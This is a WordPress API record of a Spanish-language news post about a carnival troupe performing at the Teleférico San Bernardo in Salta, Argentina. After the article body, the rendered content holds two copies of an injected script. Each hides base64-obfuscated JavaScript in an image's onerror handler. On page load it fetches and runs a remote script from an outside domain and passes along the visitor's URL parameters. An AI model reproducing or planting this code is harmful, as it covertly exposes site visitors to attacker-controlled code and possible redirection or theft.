{"id":3609,"date":"2024-02-05T10:02:26","date_gmt":"2024-02-05T13:02:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3609"},"modified":"2025-08-14T00:01:27","modified_gmt":"2025-08-14T03:01:27","slug":"carnaval-salteno-en-lo-mas-alto-en-el-teleferico-san-bernardo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3609","title":{"rendered":"\u00abCarnaval Salte\u00f1o en lo m\u00e1s alto\u00bb en el Telef\u00e9rico San Bernardo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4c4245efa83911d6c9461e3a9f4a6aa1\" style=\"background-color:#871059\"><em>Se trata de un evento libre y gratuito para los salte\u00f1os y turistas, que se dieron cita a la presentaci\u00f3n de la comparsa Los Incas.<\/em><\/h3>\n\n\n\n<p>Con otra propuesta cultural en el marco de la temporada de verano, Telef\u00e9rico San Bernardo invito a salte\u00f1os y turistas a disfrutar de una nueva experiencia en lo m\u00e1s alto de la ciudad.<\/p>\n\n\n\n<p>El pasado s\u00e1bado 3 de febrero, desde las 18 h, el mirador del Cerro San Bernardo se a convertido en el escenario perfecto para disfrutar de la alegr\u00eda y el color del carnaval salte\u00f1o.<\/p>\n\n\n\n<p>La comparsa \u00abLos Incas\u00bb, emblema cultural de Salta con m\u00e1s de 40 a\u00f1os de trayectoria en los corsos, fue la encargada de ponerle m\u00fasica y baile a un atardecer muy especial. Se presentaron con gorros mayores, cajas, tumbadoras y trajes t\u00edpicos para conocer a\u00fan m\u00e1s de nuestra fiesta carnestolenda.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/carnaval-saltenio-en-lo-mas-alto-en-el-teleferico-san-bernardo-94047\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de un evento libre y gratuito para los salte\u00f1os y turistas, que se dieron cita a la presentaci\u00f3n de la comparsa Los Incas. Con otra propuesta cultural en el marco de la temporada de verano, Telef\u00e9rico San Bernardo invito a salte\u00f1os y turistas a disfrutar de una nueva experiencia en lo m\u00e1s alto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3610,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13,17],"tags":[],"class_list":{"0":"post-3609","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3609"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3609"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3609\/revisions"}],"predecessor-version":[{"id":6864,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3609\/revisions\/6864"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3610"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}